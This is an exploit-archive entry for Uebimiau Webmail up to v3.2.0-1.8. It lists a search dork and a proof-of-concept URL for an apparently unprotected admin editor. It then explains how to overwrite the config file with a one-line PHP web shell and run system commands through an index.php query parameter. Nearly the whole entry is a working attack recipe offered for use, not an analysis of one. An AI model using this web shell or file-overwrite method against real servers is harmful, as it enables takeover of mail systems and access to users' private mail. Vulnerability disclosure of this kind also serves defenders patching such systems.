id: 5362
date: 06/11/2009
title: Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
author: GoLd_M
cves: 

=======================================================================
Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
=======================================================================


Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
     /uebimiau/admin/editor.php?load=config
And You Can Write Any Code As 
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go 
     /uebimiau/index.php?cmd=id



#  0day.today [2023-03-24]  #